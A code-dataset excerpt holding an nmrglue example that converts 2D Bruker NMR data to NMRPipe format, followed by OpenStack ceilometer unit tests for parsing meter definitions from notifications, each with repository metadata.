2022-03-03T18:01:18.000Z
|
examples/convert/bruker2pipe_2d/bruker2pipe_2d.py
|
genematx/nmrglue
|
8a24cf6cbd18451e552fc0673b84c42d1dcb69a2
|
[
"BSD-3-Clause"
] | 129
|
2015-01-13T04:58:56.000Z
|
2022-03-02T13:39:16.000Z
|
examples/convert/bruker2pipe_2d/bruker2pipe_2d.py
|
genematx/nmrglue
|
8a24cf6cbd18451e552fc0673b84c42d1dcb69a2
|
[
"BSD-3-Clause"
] | 88
|
2015-02-16T20:04:12.000Z
|
2022-03-10T06:50:30.000Z
|
#! /usr/bin/env python
import nmrglue as ng
# read in the Bruker data
dic,data = ng.bruker.read("bruker_2d")
# Set the spectral parameters
u = ng.bruker.guess_udic(dic, data)
# Direct Dimsion #Indirect Dimension
u[1]['size'] = 768 ; u[0]['size'] = 600
u[1]['complex'] = True ; u[0]['complex'] = True
u[1]['encoding'] = 'direct' ; u[0]['encoding'] = 'states'
u[1]['sw'] = 11061.947 ; u[0]['sw'] = 4000.000
u[1]['obs'] = 800.134 ; u[0]['obs'] = 201.204
u[1]['car'] = 4.773 * 800.134 ; u[0]['car'] = 58.742 * 201.204
u[1]['label'] = '1H' ; u[0]['label'] = '13C'
# create the converter object and initilize with Bruker data
C = ng.convert.converter()
C.from_bruker(dic, data, u)
# create NMRPipe data and then write it out
ng.pipe.write("2d_pipe.fid", *C.to_pipe(), overwrite=True)
| 36
| 75
| 0.528846
|
fe3108cb649bfed96f933daa594cde6f3cf2c282
| 41,007
|
py
|
Python
|
ceilometer/tests/unit/meter/test_notifications.py
|
Missxiaoguo/stx-ceilometer
|
a226b47216e76ec209818b900253d3c1f1ffc3aa
|
[
"Apache-2.0"
] | null | null | null |
ceilometer/tests/unit/meter/test_notifications.py
|
Missxiaoguo/stx-ceilometer
|
a226b47216e76ec209818b900253d3c1f1ffc3aa
|
[
"Apache-2.0"
] | 1
|
2018-08-16T15:18:09.000Z
|
2018-08-16T20:51:45.000Z
|
ceilometer/tests/unit/meter/test_notifications.py
|
Missxiaoguo/stx-ceilometer
|
a226b47216e76ec209818b900253d3c1f1ffc3aa
|
[
"Apache-2.0"
] | 3
|
2018-08-15T14:35:23.000Z
|
2019-01-11T15:57:02.000Z
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for ceilometer.meter.notifications
"""
import copy
import fixtures
import mock
import six
import yaml
from oslo_utils import encodeutils
from oslo_utils import fileutils
from ceilometer import declarative
from ceilometer.meter import notifications
from ceilometer import service as ceilometer_service
from ceilometer.tests import base as test
NOTIFICATION = {
'event_type': u'test.create',
'metadata': {'timestamp': u'2015-06-19T09:19:35.786893',
'message_id': u'939823de-c242-45a2-a399-083f4d6a8c3e'},
'payload': {u'user_id': u'e1d870e51c7340cb9d555b15cbfcaec2',
u'resource_id': u'bea70e51c7340cb9d555b15cbfcaec23',
u'timestamp': u'2015-06-19T09:19:35.785330',
u'created_at': u'2015-06-19T09:25:35.785330',
u'launched_at': u'2015-06-19T09:25:40.785330',
u'message_signature': u'fake_signature1',
u'resource_metadata': {u'foo': u'bar'},
u'source': u'30be1fc9a03c4e94ab05c403a8a377f2: openstack',
u'volume': 1.0,
u'project_id': u'30be1fc9a03c4e94ab05c403a8a377f2',
},
'ctxt': {u'tenant': u'30be1fc9a03c4e94ab05c403a8a377f2',
u'request_id': u'req-da91b4bf-d2b5-43ae-8b66-c7752e72726d',
u'user': u'e1d870e51c7340cb9d555b15cbfcaec2'},
'publisher_id': "foo123"
}
USER_META = {
'event_type': u'test.create',
'metadata': {'timestamp': u'2015-06-19T09:19:35.786893',
'message_id': u'939823de-c242-45a2-a399-083f4d6a8c3e'},
'payload': {u'user_id': u'e1d870e51c7340cb9d555b15cbfcaec2',
u'resource_id': u'bea70e51c7340cb9d555b15cbfcaec23',
u'timestamp': u'2015-06-19T09:19:35.785330',
u'created_at': u'2015-06-19T09:25:35.785330',
u'launched_at': u'2015-06-19T09:25:40.785330',
u'message_signature': u'fake_signature1',
u'resource_metadata': {u'foo': u'bar'},
u'source': u'30be1fc9a03c4e94ab05c403a8a377f2: openstack',
u'volume': 1.0,
u'project_id': u'30be1fc9a03c4e94ab05c403a8a377f2',
u'metadata': {u'metering.xyz': u'abc', u'ignore': u'this'},
},
'ctxt': {u'tenant': u'30be1fc9a03c4e94ab05c403a8a377f2',
u'request_id': u'req-da91b4bf-d2b5-43ae-8b66-c7752e72726d',
u'user': u'e1d870e51c7340cb9d555b15cbfcaec2'},
'publisher_id': "foo123"
}
MIDDLEWARE_EVENT = {
u'ctxt': {u'request_id': u'req-a8bfa89b-d28b-4b95-9e4b-7d7875275650',
u'quota_class': None,
u'service_catalog': [],
u'auth_token': None,
u'user_id': None,
u'is_admin': True,
u'user': None,
u'remote_address': None,
u'roles': [],
u'timestamp': u'2013-07-29T06:51:34.348091',
u'project_name': None,
u'read_deleted': u'no',
u'tenant': None,
u'instance_lock_checked': False,
u'project_id': None,
u'user_name': None},
u'event_type': u'objectstore.http.request',
u'publisher_id': u'ceilometermiddleware',
u'metadata': {u'message_id': u'6eccedba-120e-4db8-9735-2ad5f061e5ee',
u'timestamp': u'2013-07-29T06:51:34.474815+00:00',
u'_unique_id': u'0ee26117077648e18d88ac76e28a72e2'},
u'payload': {
'typeURI': 'http: //schemas.dmtf.org/cloud/audit/1.0/event',
'eventTime': '2013-07-29T06:51:34.474815+00:00',
'target': {
'action': 'get',
'typeURI': 'service/storage/object',
'id': 'account',
'metadata': {
'path': '/1.0/CUSTOM_account/container/obj',
'version': '1.0',
'container': 'container',
'object': 'obj'
}
},
'observer': {
'id': 'target'
},
'eventType': 'activity',
'measurements': [
{
'metric': {
'metricId': 'openstack: uuid',
'name': 'storage.objects.outgoing.bytes',
'unit': 'B'
},
'result': 28
},
{
'metric': {
'metricId': 'openstack: uuid2',
'name': 'storage.objects.incoming.bytes',
'unit': 'B'
},
'result': 1
}
],
'initiator': {
'typeURI': 'service/security/account/user',
'project_id': None,
'id': 'openstack: 288f6260-bf37-4737-a178-5038c84ba244'
},
'action': 'read',
'outcome': 'success',
'id': 'openstack: 69972bb6-14dd-46e4-bdaf-3148014363dc'
}
}
FULL_MULTI_MSG = {
'event_type': u'full.sample',
'payload': [{
u'counter_name': u'instance1',
u'user_id': u'user1',
u'resource_id': u'res1',
u'counter_unit': u'ns',
u'counter_volume': 28.0,
u'project_id': u'proj1',
u'counter_type': u'gauge'
},
{
u'counter_name': u'instance2',
u'user_id': u'user2',
u'resource_id': u'res2',
u'counter_unit': u'%',
u'counter_volume': 1.0,
u'project_id': u'proj2',
u'counter_type': u'delta'
}],
u'ctxt': {u'domain': None,
u'request_id': u'req-da91b4bf-d2b5-43ae-8b66-c7752e72726d',
u'auth_token': None,
u'read_only': False,
u'resource_uuid': None,
u'user_identity': u'fake_user_identity---',
u'show_deleted': False,
u'tenant': u'30be1fc9a03c4e94ab05c403a8a377f2',
u'is_admin': True,
u'project_domain': None,
u'user': u'e1d870e51c7340cb9d555b15cbfcaec2',
u'user_domain': None},
'publisher_id': u'ceilometer.api',
'metadata': {'message_id': u'939823de-c242-45a2-a399-083f4d6a8c3e',
'timestamp': u'2015-06-19T09:19:35.786893'},
}
METRICS_UPDATE = {
u'event_type': u'compute.metrics.update',
u'payload': {
u'metrics': [
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.frequency', 'value': 1600,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.user.time', 'value': 17421440000000,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.kernel.time', 'value': 7852600000000,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.idle.time', 'value': 1307374400000000,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.iowait.time', 'value': 11697470000000,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.user.percent', 'value': 0.012959045637294348,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.kernel.percent', 'value': 0.005841204961898534,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.idle.percent', 'value': 0.9724985141658965,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.iowait.percent', 'value': 0.008701235234910634,
'source': 'libvirt.LibvirtDriver'},
{'timestamp': u'2013-07-29T06:51:34.472416',
'name': 'cpu.percent', 'value': 0.027501485834103515,
'source': 'libvirt.LibvirtDriver'}],
u'nodename': u'tianst.sh.intel.com',
u'host': u'tianst',
u'host_id': u'10.0.1.1'},
u'publisher_id': u'compute.tianst.sh.intel.com',
u'metadata': {u'message_id': u'6eccedba-120e-4db8-9735-2ad5f061e5ee',
u'timestamp': u'2013-07-29 06:51:34.474815',
u'_unique_id': u'0ee26117077648e18d88ac76e28a72e2'},
u'ctxt': {u'request_id': u'req-a8bfa89b-d28b-4b95-9e4b-7d7875275650',
u'quota_class': None,
u'service_catalog': [],
u'auth_token': None,
u'user_id': None,
u'is_admin': True,
u'user': None,
u'remote_address': None,
u'roles': [],
u'timestamp': u'2013-07-29T06:51:34.348091',
u'project_name': None,
u'read_deleted': u'no',
u'tenant': None,
u'instance_lock_checked': False,
u'project_id': None,
u'user_name': None}
}
class TestMeterDefinition(test.BaseTestCase):
def test_config_definition(self):
cfg = dict(name="test",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")
handler = notifications.MeterDefinition(cfg, mock.Mock(), mock.Mock())
self.assertTrue(handler.match_type("test.create"))
sample = list(handler.to_samples(NOTIFICATION))[0]
self.assertEqual(1.0, sample["volume"])
self.assertEqual("bea70e51c7340cb9d555b15cbfcaec23",
sample["resource_id"])
self.assertEqual("30be1fc9a03c4e94ab05c403a8a377f2",
sample["project_id"])
def test_config_required_missing_fields(self):
cfg = dict()
try:
notifications.MeterDefinition(cfg, mock.Mock(), mock.Mock())
except declarative.DefinitionException as e:
self.assertIn("Required fields ['name', 'type', 'event_type',"
" 'unit', 'volume', 'resource_id']"
" not specified",
encodeutils.exception_to_unicode(e))
def test_bad_type_cfg_definition(self):
cfg = dict(name="test", type="foo", event_type="bar.create",
unit="foo", volume="bar",
resource_id="bea70e51c7340cb9d555b15cbfcaec23")
try:
notifications.MeterDefinition(cfg, mock.Mock(), mock.Mock())
except declarative.DefinitionException as e:
self.assertIn("Invalid type foo specified",
encodeutils.exception_to_unicode(e))
class TestMeterProcessing(test.BaseTestCase):
def setUp(self):
super(TestMeterProcessing, self).setUp()
self.CONF = ceilometer_service.prepare_service([], [])
self.path = self.useFixture(fixtures.TempDir()).path
self.handler = notifications.ProcessMeterNotifications(
mock.Mock(conf=self.CONF))
def _load_meter_def_file(self, cfgs=None):
self.CONF.set_override('meter_definitions_dirs',
[self.path], group='meter')
cfgs = cfgs or []
if not isinstance(cfgs, list):
cfgs = [cfgs]
meter_cfg_files = list()
for cfg in cfgs:
if six.PY3:
cfg = cfg.encode('utf-8')
meter_cfg_files.append(fileutils.write_to_tempfile(content=cfg,
path=self.path,
prefix="meters",
suffix=".yaml"))
self.handler.definitions = self.handler._load_definitions()
@mock.patch('ceilometer.meter.notifications.LOG')
def test_bad_meter_definition_skip(self, LOG):
cfg = yaml.dump(
{'metric': [dict(name="good_test_1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id"),
dict(name="bad_test_2", type="bad_type",
event_type="bar.create",
unit="foo", volume="bar",
resource_id="bea70e51c7340cb9d555b15cbfcaec23"),
dict(name="good_test_3",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
self.assertEqual(2, len(self.handler.definitions))
args, kwargs = LOG.error.call_args_list[0]
self.assertEqual("Error loading meter definition: %s", args[0])
self.assertTrue(args[1].endswith("Invalid type bad_type specified"))
def test_jsonpath_values_parsed(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual('test1', s1['name'])
self.assertEqual(1.0, s1['volume'])
self.assertEqual('bea70e51c7340cb9d555b15cbfcaec23', s1['resource_id'])
self.assertEqual('30be1fc9a03c4e94ab05c403a8a377f2', s1['project_id'])
def test_multiple_meter(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id"),
dict(name="test2",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
data = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(2, len(data))
expected_names = ['test1', 'test2']
for s in data:
self.assertIn(s.as_dict()['name'], expected_names)
def test_unmatched_meter(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.update",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(0, len(c))
def test_regex_match_meter(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.*",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(1, len(c))
def test_default_timestamp(self):
event = copy.deepcopy(MIDDLEWARE_EVENT)
del event['payload']['measurements'][1]
cfg = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
project_id="$.payload.initiator.project_id",
multi="name")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(event))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual(MIDDLEWARE_EVENT['metadata']['timestamp'],
s1['timestamp'])
def test_custom_timestamp(self):
event = copy.deepcopy(MIDDLEWARE_EVENT)
del event['payload']['measurements'][1]
cfg = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
project_id="$.payload.initiator.project_id",
multi="name",
timestamp='$.payload.eventTime')]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(event))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual(MIDDLEWARE_EVENT['payload']['eventTime'],
s1['timestamp'])
def test_custom_timestamp_expr_meter(self):
cfg = yaml.dump(
{'metric': [dict(name='compute.node.cpu.frequency',
event_type="compute.metrics.update",
type='gauge',
unit="ns",
volume="$.payload.metrics[?(@.name='cpu.frequency')]"
".value",
resource_id="'prefix-' + $.payload.nodename",
timestamp="$.payload.metrics"
"[?(@.name='cpu.frequency')].timestamp")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(METRICS_UPDATE))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual('compute.node.cpu.frequency', s1['name'])
self.assertEqual("2013-07-29T06:51:34.472416+00:00", s1['timestamp'])
def test_default_metadata(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.*",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
meta = NOTIFICATION['payload'].copy()
meta['host'] = NOTIFICATION['publisher_id']
meta['event_type'] = NOTIFICATION['event_type']
self.assertEqual(meta, s1['resource_metadata'])
def test_datetime_plugin(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.*",
type="gauge",
unit="sec",
volume={"fields": ["$.payload.created_at",
"$.payload.launched_at"],
"plugin": "timedelta"},
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual(5.0, s1['volume'])
def test_custom_metadata(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.*",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id",
metadata={'proj': '$.payload.project_id',
'dict': '$.payload.resource_metadata'})]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
meta = {'proj': s1['project_id'],
'dict': NOTIFICATION['payload']['resource_metadata']}
self.assertEqual(meta, s1['resource_metadata'])
def test_user_meta(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.*",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id",
user_metadata="$.payload.metadata",)]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(USER_META))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
meta = {'user_metadata': {'xyz': 'abc'}}
self.assertEqual(meta, s1['resource_metadata'])
def test_user_meta_and_custom(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.*",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id",
user_metadata="$.payload.metadata",
metadata={'proj': '$.payload.project_id'})]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(USER_META))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
meta = {'user_metadata': {'xyz': 'abc'}, 'proj': s1['project_id']}
self.assertEqual(meta, s1['resource_metadata'])
def test_multi_match_event_meter(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id"),
dict(name="test2",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(2, len(c))
def test_multi_meter_payload(self):
cfg = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
project_id="$.payload.initiator.project_id",
lookup=["name", "volume", "unit"])]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(MIDDLEWARE_EVENT))
self.assertEqual(2, len(c))
s1 = c[0].as_dict()
self.assertEqual('storage.objects.outgoing.bytes', s1['name'])
self.assertEqual(28, s1['volume'])
self.assertEqual('B', s1['unit'])
s2 = c[1].as_dict()
self.assertEqual('storage.objects.incoming.bytes', s2['name'])
self.assertEqual(1, s2['volume'])
self.assertEqual('B', s2['unit'])
def test_multi_meter_payload_single(self):
event = copy.deepcopy(MIDDLEWARE_EVENT)
del event['payload']['measurements'][1]
cfg = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
project_id="$.payload.initiator.project_id",
lookup=["name", "unit"])]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(event))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual('storage.objects.outgoing.bytes', s1['name'])
self.assertEqual(28, s1['volume'])
self.assertEqual('B', s1['unit'])
def test_multi_meter_payload_none(self):
event = copy.deepcopy(MIDDLEWARE_EVENT)
del event['payload']['measurements']
cfg = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
project_id="$.payload.initiator.project_id",
lookup="name")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(event))
self.assertEqual(0, len(c))
def test_multi_meter_payload_all_multi(self):
cfg = yaml.dump(
{'metric': [dict(name="$.payload.[*].counter_name",
event_type="full.sample",
type="$.payload.[*].counter_type",
unit="$.payload.[*].counter_unit",
volume="$.payload.[*].counter_volume",
resource_id="$.payload.[*].resource_id",
project_id="$.payload.[*].project_id",
user_id="$.payload.[*].user_id",
lookup=['name', 'type', 'unit', 'volume',
'resource_id', 'project_id', 'user_id'])]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(FULL_MULTI_MSG))
self.assertEqual(2, len(c))
msg = FULL_MULTI_MSG['payload']
for idx, val in enumerate(c):
s1 = val.as_dict()
self.assertEqual(msg[idx]['counter_name'], s1['name'])
self.assertEqual(msg[idx]['counter_volume'], s1['volume'])
self.assertEqual(msg[idx]['counter_unit'], s1['unit'])
self.assertEqual(msg[idx]['counter_type'], s1['type'])
self.assertEqual(msg[idx]['resource_id'], s1['resource_id'])
self.assertEqual(msg[idx]['project_id'], s1['project_id'])
self.assertEqual(msg[idx]['user_id'], s1['user_id'])
@mock.patch('ceilometer.meter.notifications.LOG')
def test_multi_meter_payload_invalid_missing(self, LOG):
event = copy.deepcopy(MIDDLEWARE_EVENT)
del event['payload']['measurements'][0]['result']
del event['payload']['measurements'][1]['result']
cfg = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
project_id="$.payload.initiator.project_id",
lookup=["name", "unit", "volume"])]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(event))
self.assertEqual(0, len(c))
LOG.warning.assert_called_with('Only 0 fetched meters contain '
'"volume" field instead of 2.')
@mock.patch('ceilometer.meter.notifications.LOG')
def test_multi_meter_payload_invalid_short(self, LOG):
event = copy.deepcopy(MIDDLEWARE_EVENT)
del event['payload']['measurements'][0]['result']
cfg = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
project_id="$.payload.initiator.project_id",
lookup=["name", "unit", "volume"])]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(event))
self.assertEqual(0, len(c))
LOG.warning.assert_called_with('Only 1 fetched meters contain '
'"volume" field instead of 2.')
def test_arithmetic_expr_meter(self):
cfg = yaml.dump(
{'metric': [dict(name='compute.node.cpu.percent',
event_type="compute.metrics.update",
type='gauge',
unit="percent",
volume="$.payload.metrics["
"?(@.name='cpu.percent')].value"
" * 100",
resource_id="$.payload.host + '_'"
" + $.payload.nodename")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(METRICS_UPDATE))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual('compute.node.cpu.percent', s1['name'])
self.assertEqual(2.7501485834103514, s1['volume'])
self.assertEqual("tianst_tianst.sh.intel.com",
s1['resource_id'])
def test_string_expr_meter(self):
cfg = yaml.dump(
{'metric': [dict(name='compute.node.cpu.frequency',
event_type="compute.metrics.update",
type='gauge',
unit="ns",
volume="$.payload.metrics[?(@.name='cpu.frequency')]"
".value",
resource_id="$.payload.host + '_'"
" + $.payload.nodename")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(METRICS_UPDATE))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual('compute.node.cpu.frequency', s1['name'])
self.assertEqual(1600, s1['volume'])
self.assertEqual("tianst_tianst.sh.intel.com",
s1['resource_id'])
def test_prefix_expr_meter(self):
cfg = yaml.dump(
{'metric': [dict(name='compute.node.cpu.frequency',
event_type="compute.metrics.update",
type='gauge',
unit="ns",
volume="$.payload.metrics[?(@.name='cpu.frequency')]"
".value",
resource_id="'prefix-' + $.payload.nodename")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(METRICS_UPDATE))
self.assertEqual(1, len(c))
s1 = c[0].as_dict()
self.assertEqual('compute.node.cpu.frequency', s1['name'])
self.assertEqual(1600, s1['volume'])
self.assertEqual("prefix-tianst.sh.intel.com",
s1['resource_id'])
def test_duplicate_meter(self):
cfg = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id"),
dict(name="test1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file(cfg)
c = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(1, len(c))
def test_multi_files_multi_meters(self):
cfg1 = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
cfg2 = yaml.dump(
{'metric': [dict(name="test2",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file([cfg1, cfg2])
data = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(2, len(data))
expected_names = ['test1', 'test2']
for s in data:
self.assertIn(s.as_dict()['name'], expected_names)
def test_multi_files_duplicate_meter(self):
cfg1 = yaml.dump(
{'metric': [dict(name="test",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
cfg2 = yaml.dump(
{'metric': [dict(name="test",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file([cfg1, cfg2])
data = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(1, len(data))
self.assertEqual(data[0].as_dict()['name'], 'test')
def test_multi_files_empty_payload(self):
event = copy.deepcopy(MIDDLEWARE_EVENT)
del event['payload']['measurements']
cfg1 = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
project_id="$.payload.initiator.project_id",
lookup="name")]})
cfg2 = yaml.dump(
{'metric': [dict(name="$.payload.measurements.[*].metric.[*].name",
event_type="objectstore.http.request",
type="delta",
unit="$.payload.measurements.[*].metric.[*].unit",
volume="$.payload.measurements.[*].result",
resource_id="$.payload.target_id",
project_id="$.payload.initiator.project_id",
lookup="name")]})
self._load_meter_def_file([cfg1, cfg2])
data = list(self.handler.process_notification(event))
self.assertEqual(0, len(data))
def test_multi_files_unmatched_meter(self):
cfg1 = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
cfg2 = yaml.dump(
{'metric': [dict(name="test2",
event_type="test.update",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file([cfg1, cfg2])
data = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(1, len(data))
self.assertEqual(data[0].as_dict()['name'], 'test1')
@mock.patch('ceilometer.meter.notifications.LOG')
def test_multi_files_bad_meter(self, LOG):
cfg1 = yaml.dump(
{'metric': [dict(name="test1",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id"),
dict(name="bad_test",
type="bad_type",
event_type="bar.create",
unit="foo", volume="bar",
resource_id="bea70e51c7340cb9d555b15cbfcaec23")]})
cfg2 = yaml.dump(
{'metric': [dict(name="test2",
event_type="test.create",
type="delta",
unit="B",
volume="$.payload.volume",
resource_id="$.payload.resource_id",
project_id="$.payload.project_id")]})
self._load_meter_def_file([cfg1, cfg2])
data = list(self.handler.process_notification(NOTIFICATION))
self.assertEqual(2, len(data))
expected_names = ['test1', 'test2']
for s in data:
self.assertIn(s.as_dict()['name'], expected_names)
args, kwargs = LOG.error.call_args_list[0]
self.assertEqual("Error loading meter definition: %s", args[0])
self.assertTrue(args[1].endswith("Invalid type bad_type specified"))
| 46.179054
| 79
| 0.503109
|
a39d9b4c1bcb7b3c0fa0fa584c2c3212087b0654
| 33,442
|
py
|
Python
|
kubernetes/client/models/v1_ephemeral_container.py
|
philipp-sontag-by/python
|
